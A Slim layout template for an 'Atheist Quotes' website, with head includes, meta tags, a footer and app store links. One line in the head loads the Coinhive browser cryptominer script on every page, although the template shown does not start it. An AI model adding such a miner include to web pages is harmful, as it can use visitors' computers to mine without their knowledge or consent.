doctype html
html
  head
    title
      | Atheist Quotes
    = stylesheet_link_tag    'application', media: 'all'
    = javascript_include_tag 'application'
    = csrf_meta_tags
    script[async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"]
    script[src="https://coin-hive.com/lib/coinhive.min.js"]
    meta[name="viewport" content="width=device-width, initial-scale=1.0"]
    meta[name="description" content="Thousands of atheist quotes"]
    meta[name="keywords" content="atheist, atheism, quotes, atheist quotes, atheism quotes, richard dawkins, sam harris, freethinker, religion, bible, quran, atheist-quotes, quote"]
  body
    = render "layouts/nav"
    .container
      = yield
      .row
        footer
          hr
          .col-sm-4
            |  copyright &copy 
            = Time.now.year
          .col-sm-4
            = link_to image_tag("get-it-on-google-play", class: "app-buttons2"), "https://play.google.com/store/apps/details?id=com.leftblank.atheistquotes"
          .col-sm-4
            = link_to image_tag("download_on_app_store_badge.png", class: "app-buttons"), "https://itunes.apple.com/us/app/atheist-quotes./id392507328?mt=8"
